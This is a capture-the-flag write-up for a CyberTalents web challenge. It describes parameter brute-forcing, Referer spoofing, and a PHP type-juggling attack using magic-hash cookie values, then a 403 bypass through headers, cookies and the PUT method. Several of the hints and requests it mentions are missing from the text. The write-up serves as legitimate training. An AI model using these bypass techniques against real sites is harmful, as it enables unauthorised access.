Creative Thinking will make getting the flag so much easier
Challenge Link: https://cybertalents.com/challenges/web/skiddykill3r
The homepage contains a simple page that has only one function mage by result.php which accepts a name as a user input. After viewing the source code of this you find the following hint.
So we can go back to the first page and add Momen as a name. you will find again anther hint which says:
Moving to hint.php you will see hint that tells you:
So, I think here we need to make some parameter bruter forcing with the value of True. I will use the following list and add it to the burp intruder.
the show parameter appears to be the right one. next we will see the following code that contains some condition that we need to do to get the flag.
The first case is easy we need only to add the refferer header with the value of http://cyberguy
The second case is appears to be a type juggling attack after a lot of search about this I found a hint to it in the php documentation website.
Adding the following cookie will let us receive the second part of the flag.
1 Cookie: flag=240610708; flag1=QNKCDZO
The last case is will give us a hint to the full flag. it easy to apply by changing the value of the parameter and the cookie to:
1 2 /skiddy/hint.php?show=True&flag=HiNt Cookie: flag=True
Moving to robots.txt we will find anther hint:
After browsing to this file it gives us 403 forbidden. So we need to find a way to bypass this.
After lots of trial and error I found that we should add a referrer header with the same value of the website URL and also add the cookie value of the second case and changing the request method to PUT. The request should look something like that:
Anther hint which tell us to access the user_check.php with the following User-Agent
And Finally we will get the whole flag.